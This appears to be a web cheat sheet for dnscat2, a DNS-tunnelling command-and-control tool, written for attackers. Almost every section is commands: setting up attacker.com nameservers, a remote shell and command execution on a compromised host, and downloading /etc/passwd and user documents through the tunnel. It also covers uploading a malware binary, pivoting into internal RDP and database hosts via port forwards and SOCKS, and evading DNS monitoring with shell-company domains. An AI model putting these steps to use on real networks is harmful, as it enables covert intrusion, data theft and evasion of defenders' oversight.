dnscat2
dnscat2 creates encrypted DNS tunnels for command-and-control communication, allowing attackers to bypass network restrictions by hiding traffic within DNS queries. It supports multiple DNS record types, session management, and full bidirectional communication channels.
Installation
Seção intitulada “Installation”Server Setup (Ruby)
Seção intitulada “Server Setup (Ruby)”Install dnscat2 server from source with Ruby dependencies:
# Clone server repository
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
# Install Ruby gems
gem install sinatra
gem install trollop
gem install bundler
# Or use Gemfile
bundle install
# Run server
ruby dnscat2.rb domain.comRequired Ruby gems: sinatra, trollop, optional eventmachine for async operations.
Client Compilation (C)
Seção intitulada “Client Compilation (C)”Compile the C client with make:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client
# Compile with make
make
# Or compile with gcc directly
gcc -o dnscat dnscat.c -lm -lpthread
# Windows (MinGW)
make windowsDependencies: libpthread, libm (math library), libwininet for Windows builds.
Infrastructure Setup
Seção intitulada “Infrastructure Setup”Domain and DNS Configuration
Seção intitulada “Domain and DNS Configuration”Register a domain and delegate it to your authoritative DNS server:
# Delegate subdomain to your NS records
your-domain.com NS ns.attacker.comConfigure authoritative DNS server to handle queries for your tunnel domain:
# Example with BIND (named.conf)
zone "tunnel.attacker.com" {
type master;
file "/etc/bind/zones/tunnel.attacker.com";
allow-transfer { none; };
};Authoritative DNS Server
Seção intitulada “Authoritative DNS Server”Point NS records to your controlled nameserver where dnscat2 will listen:
# DNS record configuration
tunnel.attacker.com IN NS dns1.attacker.com
dns1.attacker.com IN A 192.0.2.100dnscat2 server listens on UDP port 53 by default. Ensure firewall allows inbound DNS traffic.
Server Usage
Seção intitulada “Server Usage”Basic Server Launch
Seção intitulada “Basic Server Launch”Start the dnscat2 server on specified domain:
# Default usage
ruby dnscat2.rb domain.com
# Listen on specific interface
ruby dnscat2.rb --dns server=0.0.0.0,53 domain.com
# With port specification
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com
# Verbose output
ruby dnscat2.rb -v domain.com
# Super verbose (debug)
ruby dnscat2.rb -vv domain.comSecurity Options
Seção intitulada “Security Options”Enable encryption and authentication on the server:
# Require pre-shared secret for authentication
ruby dnscat2.rb --secret mysecretkey domain.com
# Security modes
ruby dnscat2.rb --security=open domain.com # No encryption
ruby dnscat2.rb --security=encrypted domain.com # Encrypted, no auth
ruby dnscat2.rb --secret key --security=encrypted domain.com
# Disable caching (forces fresh DNS lookups)
ruby dnscat2.rb --no-cache domain.com
# Set max packet length
ruby dnscat2.rb --max-length 255 domain.comClient Usage
Seção intitulada “Client Usage”Basic Client Connection
Seção intitulada “Basic Client Connection”Connect to dnscat2 server from compromised host:
# Basic connection
./dnscat --dns domain=domain.com
# Specify DNS server IP
./dnscat --dns server=192.0.2.100 --dns domain=domain.com
# With pre-shared secret
./dnscat --dns domain=domain.com --secret mysecretkey
# Verbose mode
./dnscat --dns domain=domain.com -vDNS Record Type Selection
Seção intitulada “DNS Record Type Selection”Specify which DNS record types to use for tunneling:
# Use TXT records (most reliable)
./dnscat --dns type=TXT --dns domain=domain.com
# Use MX records
./dnscat --dns type=MX --dns domain=domain.com
# Use CNAME records
./dnscat --dns type=CNAME --dns domain=domain.com
# Use A records
./dnscat --dns type=A --dns domain=domain.com
# Use AAAA records (IPv6)
./dnscat --dns type=AAAA --dns domain=domain.com
# Cycle through multiple types
./dnscat --dns type=TXT --dns type=MX --dns domain=domain.comRetransmission and Reliability
Seção intitulada “Retransmission and Reliability”Control packet retransmission behavior:
# Set maximum retransmit attempts
./dnscat --max-retransmits 5 --dns domain=domain.com
# Increase timeout (milliseconds)
./dnscat --dns timeout=1000 --dns domain=domain.com
# Reduce timeout for faster response
./dnscat --dns timeout=500 --dns domain=domain.comSession Management
Seção intitulada “Session Management”Interactive Commands
Seção intitulada “Interactive Commands”Manage active sessions within dnscat2 server:
# List all active sessions
> sessions
# Connect to specific session
> session -i 1
# Kill a session
> kill 1
# Suspend session (without terminating)
> suspend 1
# Resume suspended session
> resume 1
# Clear history
> history clearSession Types
Seção intitulada “Session Types”Sessions vary by type and functionality:
# View session details
> sessions -i 1 --detailed
# Switch between sessions quickly
> session -i 2
> session -i 3Command Shell
Seção intitulada “Command Shell”Interactive Shell Access
Seção intitulada “Interactive Shell Access”Establish interactive shell through DNS tunnel:
# Start shell session
> shell
# Execute single command
> exec whoami
> exec ifconfig
> exec cat /etc/passwdExecute Remote Commands
Seção intitulada “Execute Remote Commands”Run commands without interactive shell:
# From server console
> exec id
> exec uname -a
> exec ps aux
> exec netstat -anFile Transfer
Seção intitulada “File Transfer”Download Files from Target
Seção intitulada “Download Files from Target”Retrieve files through DNS tunnel to attacker system:
# Download single file
> download /etc/passwd
# Download to specific path
> download /etc/passwd /tmp/passwd.txt
# Download entire directory
> download /home/user/documentsUpload Files to Target
Seção intitulada “Upload Files to Target”Transfer files from attacker to compromised host:
# Upload file
> upload /path/to/local/file /path/on/target
# Upload with confirmation
> upload ./malware.elf /tmp/malware.elfPort Forwarding
Seção intitulada “Port Forwarding”Local Port Forwarding Through Tunnel
Seção intitulada “Local Port Forwarding Through Tunnel”Forward local ports through the DNS tunnel:
# Listen on local port and forward through tunnel
> listen 127.0.0.1 4444 target_ip 3389
# Forward multiple ports
> listen 127.0.0.1 8080 internal-web-server 80
> listen 127.0.0.1 5432 internal-db 5432Accessing Forwarded Services
Seção intitulada “Accessing Forwarded Services”Connect to internal services via forwarded ports:
# RDP through tunnel
rdesktop 127.0.0.1:4444
# SSH through tunnel
ssh -p 2222 user@127.0.0.1
# Database access
mysql -h 127.0.0.1 -P 5432 -u rootTunneling
Seção intitulada “Tunneling”SOCKS Proxy Setup
Seção intitulada “SOCKS Proxy Setup”Create SOCKS proxy for full network access through tunnel:
# Establish SOCKS proxy
> socks 127.0.0.1 1080
# Access internal network through proxy
proxy-host: 127.0.0.1
proxy-port: 1080Using SOCKS Proxy
Seção intitulada “Using SOCKS Proxy”Route traffic through established SOCKS tunnel:
# curl through SOCKS
curl --socks5 127.0.0.1:1080 http://internal-server
# SSH through SOCKS
ssh -o ProxyCommand='nc -x 127.0.0.1:1080 %h %p' user@internal-host
# Proxychains configuration
proxychains nmap -sV internal-networkEncryption
Seção intitulada “Encryption”Pre-Shared Secret Authentication
Seção intitulada “Pre-Shared Secret Authentication”Use pre-shared keys for authentication between client and server:
# Server with secret
ruby dnscat2.rb --secret "SuperSecretPassword123" domain.com
# Client with matching secret
./dnscat --secret "SuperSecretPassword123" --dns domain=domain.comSAS Authentication
Seção intitulada “SAS Authentication”Verify connection with SAS (Short Authentication String):
# Server prompts SAS on first connection
# Compare SAS on both client and server console
# Type "y" to confirm match
SAS (client): abc123
SAS (server): abc123Encryption Modes
Seção intitulada “Encryption Modes”Different encryption configurations:
# No encryption (--security=open)
ruby dnscat2.rb --security=open domain.com
# Encrypted without authentication
ruby dnscat2.rb --security=encrypted domain.com
# Encrypted with pre-shared secret (most secure)
ruby dnscat2.rb --security=encrypted --secret mykey domain.comDNS Record Types
Seção intitulada “DNS Record Types”Record Type Comparison
Seção intitulada “Record Type Comparison”| Type | Size | Reliability | Stealth | Detection Risk |
|---|---|---|---|---|
| TXT | ~255 bytes | Excellent | Good | Medium |
| A | 4 bytes | Excellent | Poor | High |
| AAAA | 16 bytes | Good | Poor | High |
| MX | Variable | Good | Medium | Medium |
| CNAME | Variable | Good | Medium | Medium |
| NS | Variable | Moderate | Medium | Medium |
Choosing Record Types
Seção intitulada “Choosing Record Types”Select based on network filtering and monitoring:
# TXT records - most reliable, common in logs
./dnscat --dns type=TXT --dns domain=domain.com
# A records - small, fast, but suspicious high volume
./dnscat --dns type=A --dns domain=domain.com
# MX records - less monitored, good alternative
./dnscat --dns type=MX --dns domain=domain.com
# Mixed types - rotate for evasion
./dnscat --dns type=TXT --dns type=MX --dns type=CNAME --dns domain=domain.comTroubleshooting
Seção intitulada “Troubleshooting”Connection Issues
Seção intitulada “Connection Issues”Verify DNS resolution and connectivity:
# Test DNS resolution
nslookup query.domain.com
dig @ns.attacker.com query.domain.com
# Check server listening
netstat -ulnp | grep 53
ss -ulnp | grep 53
# Test with dig from client
dig @192.0.2.100 test.domain.com TXTFirewall and Restrictions
Seção intitulada “Firewall and Restrictions”Bypass DNS filtering and monitoring:
# If DNS port blocked, use alternate port
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com
# Client connects to alternate port
./dnscat --dns server=192.0.2.100:5353 --dns domain=domain.com
# Use DNS over HTTPS (requires additional config)
# Many corporate firewalls restrict DoHDebugging Output
Seção intitulada “Debugging Output”Increase verbosity for troubleshooting:
# Client verbose
./dnscat -v --dns domain=domain.com
./dnscat -vv --dns domain=domain.com
# Server verbose
ruby dnscat2.rb -v domain.com
ruby dnscat2.rb -vv domain.comBest Practices
Seção intitulada “Best Practices”Operational Security
Seção intitulada “Operational Security”Maintain stealthy DNS tunneling operations:
- Use TXT or MX records instead of A records (less suspicious)
- Rotate record types to evade pattern detection
- Use pre-shared secrets and encryption always
- Monitor DNS query volume and frequency
- Distribute queries over time to avoid rate-based detection
- Use domains registered to shell companies or compromised registrars
- Implement traffic shaping to match legitimate DNS patterns
Detection Evasion
Seção intitulada “Detection Evasion”Techniques to avoid network monitoring:
- Randomize query intervals (add jitter to timing)
- Use legitimate-looking subdomains and query names
- Limit bandwidth to match normal DNS traffic
- Avoid querying during off-hours (traffic analysis)
- Use multiple tunnel domains if possible
- Implement retry logic for failed queries
- Monitor for DNS query logging and filtering
Operational Security Checklist
Seção intitulada “Operational Security Checklist”# Test DNS filtering
./dnscat --dns type=TXT --dns domain=test.domain.com
# Verify encryption works
./dnscat --secret testkey --dns domain=domain.com
# Monitor bandwidth
top -p $(pgrep dnscat)
# Check query logs
tail -f /var/log/syslog | grep "domain.com"Related Tools
Seção intitulada “Related Tools”Alternative DNS Tunneling Solutions
Seção intitulada “Alternative DNS Tunneling Solutions”| Tool | Purpose | Advantages |
|---|---|---|
| Iodine | DNS tunnel (older) | Lightweight, simple |
| dns2tcp | TCP over DNS | Reliable, RFC-compliant |
| Chisel | HTTP/HTTPS tunneling | Modern, GO-based |
| Cobalt Strike | Beacon DNS plugin | Enterprise C2, integrated |
| OzymanDNS | DNS tunneling | Simple Python implementation |
| DNSExfil | Data exfiltration | Stealthy, modular |
Related Attack Techniques
Seção intitulada “Related Attack Techniques”- DNS rebinding attacks
- DNS cache poisoning
- DNSSEC spoofing
- DNS amplification DDoS
- DNS tunneling with VPN overlay